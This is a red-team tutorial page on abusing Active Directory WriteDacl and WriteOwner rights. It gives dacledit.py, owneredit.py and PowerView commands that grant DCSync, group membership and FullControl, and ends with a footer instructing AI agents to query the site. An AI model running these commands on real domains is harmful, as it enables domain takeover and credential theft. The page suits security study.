# Granting Rights and Ownership Permissions such as `WriteDacl` and `Ownership`, play a crucial role in controlling access to objects and ensuring their security. The `WriteDacl` access right refers to the privilege that allows an account to modify the `DACL` of a target object. `Ownership` on the other hand denotes the state of possessing administrative control over an object. Understanding the significance of these access rights is essential as they can impact the vulnerability and potential abuses associated with the manipulated `DACL`. If we possess an account with privileges to modify a target object's DACL we can use that account to edit the target's DACL and make it vulnerable to other attacks. #### WriteDacl Once we find an account with `WriteDacl` or `Ownership` over another object we can modify the DACLs to, for example, add DCSync permissions towards the entire domain ``` dacledit.py -principal otter -target-dn dc=domain,dc=com -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' -action write -rights DCSync ``` ``` Import-Module .\PowerView.ps1 Add-DomainObjectAcl -TargetIdentity $(Get-DomainSID) -PrincipalIdentity otter -Rights DCSync -Verbose ``` Another option would be adding ourselves to a group ``` dacledit.py -principal otter -target "Vulnerable Group" -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' ``` Now we can add ourselves or another user to a group like we did in the [AddMembers](/red-teaming/notes/dacl-abuse/addmembers.md) section. #### WriteOwner This DACL allows us to modify the `owner` of the target object, specifically the `OwnerSid` sub-attribute within the object's `security descriptor`. ``` MATCH p=((n:User)-[r:WriteOwner]->(m)) RETURN p ``` With this kind of right we can perform a [GPO attack](/red-teaming/notes/dacl-abuse/gpo-attacks.md). Specifically, we can abuse `WriteOwner` by using `owneredit` ``` owneredit.py -action write -new-owner otter -target targetUser -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' ``` usually this step is followed by changing the DACL of the new user to something like `FullControl` ``` dacledit.py -principal otter -target targetUser -action write -rights FullControl -dc-ip 10.10.10.10 domain.com/otter:'SomethingSecure123!' ``` From Windows we can do something similar ```powershell Set-DomainObjectOwner -Identity targetUser -OwnerIdentity otter -Verbose Add-DomainObjectAcl -TargetIdentity targetUser -PrincipalIdentity otter -Rights All -Verbose ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://otter.gitbook.io/red-teaming/notes/dacl-abuse/granting-rights-and-ownership.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.